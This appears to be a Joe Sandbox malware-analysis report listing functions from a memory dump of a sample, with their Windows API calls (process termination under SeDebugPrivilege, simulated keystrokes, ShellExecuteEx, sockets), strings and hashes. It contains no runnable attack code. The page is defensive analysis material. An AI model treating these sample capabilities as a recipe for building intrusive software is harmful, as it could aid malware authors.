Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 9c7823d7f9aee4840ea58020325ce378c11bf5d97260bf4c42132fbcb234fb07
Instruction ID: a96b61598baa10f2f198459ba3a648733516b036362180e6f4cbded304f2869b
Opcode Fuzzy Hash: 9c7823d7f9aee4840ea58020325ce378c11bf5d97260bf4c42132fbcb234fb07
Instruction Fuzzy Hash: 22911671D00229ABDF10DFA5DC45EDEBBBAAF09310F20415AF519A7291DB71AA44CFA0

Function 006A6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006A6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 006A6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006A6E52
_wcscat.LIBCMT ref: 006A6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 006A6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 006A6EF2

Strings

SysListView32, xrefs: 006A6DF6

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: d81740ab616d07bd99efcb187bbb3e9ab3e19fe1eaaffbf54fd2e608cfd6eaee
Instruction ID: 65a78faf496ae13392382e2eef105475052beb1dcc2c056c8827287849cabe7f
Opcode Fuzzy Hash: d81740ab616d07bd99efcb187bbb3e9ab3e19fe1eaaffbf54fd2e608cfd6eaee
Instruction Fuzzy Hash: 7D419070A00349AFEF21AFA4CC85BEA77EAEF09350F14042AF585E7291D6719D848F64

Function 0069E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00683C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00683C7A
Part of subcall function 00683C55: Process32FirstW.KERNEL32(00000000,?), ref: 00683C88
Part of subcall function 00683C55: CloseHandle.KERNEL32(00000000), ref: 00683D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069E9A4
GetLastError.KERNEL32 ref: 0069E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0069EA63
GetLastError.KERNEL32(00000000), ref: 0069EA6E
CloseHandle.KERNEL32(00000000), ref: 0069EAA3

Strings

SeDebugPrivilege, xrefs: 0069E9C2

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e425acbc3759d443eb295ea4ca55071b89acef195f868bc0006102b87393e254
Instruction ID: 229b283082ba71bf006e9da807f170cc21b8f63efacdf6b6c55cef28586e905a
Opcode Fuzzy Hash: e425acbc3759d443eb295ea4ca55071b89acef195f868bc0006102b87393e254
Instruction Fuzzy Hash: 95418A716002019FDB14EF54D895BADB7A6AF81314F08845CF9469B3D2CB76A805CF9A

Function 00682F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00683033

Strings

blank, xrefs: 00682FB5
warning, xrefs: 0068301C
info, xrefs: 00682FD4
question, xrefs: 00682FEC
stop, xrefs: 00683004

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 01a1258ed67c3a70ea29eeb4bb3007c4ee619e5c0b99330f70c88104ae6e67cc
Instruction ID: 0a72090bf74c5a780a97eda011cb4b769ddedb9562bf7795a0ab2d40c0012628
Opcode Fuzzy Hash: 01a1258ed67c3a70ea29eeb4bb3007c4ee619e5c0b99330f70c88104ae6e67cc
Instruction Fuzzy Hash: C8112731748357BEE714BB54EC42CAB779FDF19720B20012AFA00A6382DBB1AF4057A5

Function 006842F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00684312
LoadStringW.USER32(00000000), ref: 00684319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0068432F
LoadStringW.USER32(00000000), ref: 00684336
_wprintf.LIBCMT ref: 0068435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0068437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00684357

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: e34bef94b272b5503b715f240a239a30d7648f930345dbf923cbbd2f89fc9935
Instruction ID: 0ccd2dd472e6d31dd414aea5ed833102f8b44dd296d73b61de1ffd07242acef2
Opcode Fuzzy Hash: e34bef94b272b5503b715f240a239a30d7648f930345dbf923cbbd2f89fc9935
Instruction Fuzzy Hash: 8F01A2F2840208BFE750BBE0DD89EE7776DDB09300F0015A1B705E2111EA706E854F75

Function 006AD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

GetSystemMetrics.USER32(0000000F), ref: 006AD47C
GetSystemMetrics.USER32(0000000F), ref: 006AD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006AD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006AD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006AD716
ShowWindow.USER32(00000003,00000000), ref: 006AD735
InvalidateRect.USER32(?,00000000,00000001), ref: 006AD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 006AD77D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 4f4ff99c826e5c8c0fc85052f8520cdcdbd039b6f90909f67938c15a11fdbc31
Instruction ID: 03200f7b08be2d556dde7ccaac994bc287486279fbefe6f930bf78ec17455b6e
Opcode Fuzzy Hash: 4f4ff99c826e5c8c0fc85052f8520cdcdbd039b6f90909f67938c15a11fdbc31
Instruction Fuzzy Hash: 33B19A71600225ABDF18EF68C9857ED7BB2BF0A701F089069EC4A9B695D734AD50CF90

Function 00622A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0065C1C7,00000004,00000000,00000000,00000000), ref: 00622ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0065C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00622B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0065C1C7,00000004,00000000,00000000,00000000), ref: 0065C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0065C1C7,00000004,00000000,00000000,00000000), ref: 0065C286

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6b71f7f204aa24c2de2aed8eaf73117f92f46d8a8c18aaa19ea3f637c7f99a21
Instruction ID: e897307dcaf9aeb8865a271ceff322470f1423061458729c182a40969c6c5d6e
Opcode Fuzzy Hash: 6b71f7f204aa24c2de2aed8eaf73117f92f46d8a8c18aaa19ea3f637c7f99a21
Instruction Fuzzy Hash: 53414D30204F91BEC7359B28FCA87AB7BD3AB46315F14942DE44746A60C635A886DF11

Function 006870C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006870DD

Part of subcall function 00640DB6: std::exception::exception.LIBCMT ref: 00640DEC
Part of subcall function 00640DB6: __CxxThrowException@8.LIBCMT ref: 00640E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00687114
EnterCriticalSection.KERNEL32(?), ref: 00687130
_memmove.LIBCMT ref: 0068717E
_memmove.LIBCMT ref: 0068719B
LeaveCriticalSection.KERNEL32(?), ref: 006871AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006871BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 006871DE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 723b7ecfb401441ab734ade46b74bdffec1226c6b782e6ad4e51229f8a17d5c1
Instruction ID: 1cef7e9c73e8cf84384f0bfd7bbf5039d96448ebb08f32e0a60254a786b1dfae
Opcode Fuzzy Hash: 723b7ecfb401441ab734ade46b74bdffec1226c6b782e6ad4e51229f8a17d5c1
Instruction Fuzzy Hash: A2317031900215EBDB50EFA4DC85AAEB77AEF45710F1441B9F904AB246DB30EE14CB65

Function 0067BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0067BBC4
_memcmp.LIBCMT ref: 0067BBE6
_memcmp.LIBCMT ref: 0067BBFE
_memcmp.LIBCMT ref: 0067BC11
_memcmp.LIBCMT ref: 0067BC2B
_memcmp.LIBCMT ref: 0067BC3E
_memcmp.LIBCMT ref: 0067BC56
_memcmp.LIBCMT ref: 0067BC71

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f286b365e43bde3fa6e618914060b13125de370b28edda276f8bc191fdc10871
Instruction ID: 12055be964329265f1923bcb2c380bc66db4f8eff9878e428b0d46d1d07d2b26
Opcode Fuzzy Hash: f286b365e43bde3fa6e618914060b13125de370b28edda276f8bc191fdc10871
Instruction Fuzzy Hash: E22123A12002067BE3456611ED52FFB779F9E11748F08D024FD0C9A347EF24DE5182E5

Function 0068EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

Part of subcall function 0063FC86: _wcscpy.LIBCMT ref: 0063FCA9

_wcstok.LIBCMT ref: 0068EC94
_wcscpy.LIBCMT ref: 0068ED23
_memset.LIBCMT ref: 0068ED56

Strings

X, xrefs: 0068ED93

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 7d7e5885c7426543cbbcd9be85135fb3debe10b77570ff8bcdb15ee3c6275239
Instruction ID: eb776ddf910d5a97129e652e66ca358ab8860eb1902c6eeb58950fc93372118f
Opcode Fuzzy Hash: 7d7e5885c7426543cbbcd9be85135fb3debe10b77570ff8bcdb15ee3c6275239
Instruction Fuzzy Hash: CCC18E316087519FC7A4EF24D845E9AB7E2BF85310F00492DF8999B2A2DB31EC45CF56

Function 00696B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00696C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00696C21
WSAGetLastError.WSOCK32(00000000), ref: 00696C34
htons.WSOCK32(?), ref: 00696CEA
inet_ntoa.WSOCK32(?), ref: 00696CA7

Part of subcall function 0067A7E9: _strlen.LIBCMT ref: 0067A7F3
Part of subcall function 0067A7E9: _memmove.LIBCMT ref: 0067A815

_strlen.LIBCMT ref: 00696D44
_memmove.LIBCMT ref: 00696DAD

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 7d4eb8dea3b2d426d36f2f622ac28dcd08ae8cb8bb65d4c1bbb68f9440d04f94
Instruction ID: fd5c690e07f888df5bf0a85975a7b73d716c13756baa051db6c110e8810b25c0
Opcode Fuzzy Hash: 7d4eb8dea3b2d426d36f2f622ac28dcd08ae8cb8bb65d4c1bbb68f9440d04f94
Instruction Fuzzy Hash: 3C81F071204710AFCB50EF24DC82EABB7AEAF84714F10491DF5569B292DA70ED05CBA6

Function 00621424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854f517c5de8287809ee8e70b96f01f794f61381fa4d78ef0ac1b09b4a45ddd1
Instruction ID: 7e662c882a9078fb6fca041aeb61932a1d78a25b7a3ea4dba569b1ecfd99c302
Opcode Fuzzy Hash: 854f517c5de8287809ee8e70b96f01f794f61381fa4d78ef0ac1b09b4a45ddd1
Instruction Fuzzy Hash: 9A719E30904519EFCB04DF98DC48AFEBBBAFF86310F108159F915AA251C734AA52CF65

Function 006AB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(016754E0), ref: 006AB3EB
IsWindowEnabled.USER32(016754E0), ref: 006AB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006AB4DB
SendMessageW.USER32(016754E0,000000B0,?,?), ref: 006AB512
IsDlgButtonChecked.USER32(?,?), ref: 006AB54F
GetWindowLongW.USER32(016754E0,000000EC), ref: 006AB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006AB589

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 4ca52622cda42517fe836789602fd800ecf2887cec92021a0a430396bbe6bd6d
Instruction ID: af0c029c6dea43644c6698ae30420bc80923edb102838336c74a4ac0f16b323e
Opcode Fuzzy Hash: 4ca52622cda42517fe836789602fd800ecf2887cec92021a0a430396bbe6bd6d
Instruction Fuzzy Hash: 31716834605204AFEF20AF65C894BEA7BEBEB0B300F146059E956973A7C732AD51DF50

Function 0069F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069F448
_memset.LIBCMT ref: 0069F511
ShellExecuteExW.SHELL32(?), ref: 0069F556

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

Part of subcall function 0063FC86: _wcscpy.LIBCMT ref: 0063FCA9

GetProcessId.KERNEL32(00000000), ref: 0069F5CD
CloseHandle.KERNEL32(00000000), ref: 0069F5FC

Strings

@, xrefs: 0069F525

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 4a9973052f36eb8dd8939211dfe2a150d6530cc771950fd2bd304bef07ed2d43
Instruction ID: 3f83e0594195dd0790e1a65f97363b2152d527e92822d4598c5377bcd6bbd481
Opcode Fuzzy Hash: 4a9973052f36eb8dd8939211dfe2a150d6530cc771950fd2bd304bef07ed2d43
Instruction Fuzzy Hash: 5D617975A006299FCF04EFA4C4819AEBBB6FF49310F158469E815AB751CB30AD41CF98

Function 00680F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00680F8C
GetKeyboardState.USER32(?), ref: 00680FA1
SetKeyboardState.USER32(?), ref: 00681002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00681030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0068104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00681095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006810B8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cd032e79f00a207564341547131409bdbe979224b271a7e0eba7d305efee16ce
Instruction ID: 57e8740905469f46659cf2cb130e6d6aee413c74f1901aaae63b13dc403a4b88
Opcode Fuzzy Hash: cd032e79f00a207564341547131409bdbe979224b271a7e0eba7d305efee16ce
Instruction Fuzzy Hash: 2B51D3605046D539FB3663348C15BF6BEAF5B07304F088A89E2D88A9D3C699ECCAD751

Function 00680D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00680DA5
GetKeyboardState.USER32(?), ref: 00680DBA
SetKeyboardState.USER32(?), ref: 00680E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00680E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00680E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00680EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00680EC9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7444df41fcb8fadcbd0756b928533e0dc6748e998c934902f1481f01fc4ae5b6
Instruction ID: 744c3b67b03a4ed9cef68f0c9e6a93ad3c8e41cf58521fd076232787c40d3523
Opcode Fuzzy Hash: 7444df41fcb8fadcbd0756b928533e0dc6748e998c934902f1481f01fc4ae5b6
Instruction Fuzzy Hash: 795104A05046D53DFB72A3648C55BBA7EAA5F06300F088E88E1D48A9C2C395EC8DD751

Function 006855FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0068560A
_wcsncpy.LIBCMT ref: 0068563F
_wcsncpy.LIBCMT ref: 00685671
_wcsncpy.LIBCMT ref: 006856A4
_wcsncpy.LIBCMT ref: 006856E6
_wcsncpy.LIBCMT ref: 00685720
_wcsncpy.LIBCMT ref: 0068574F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
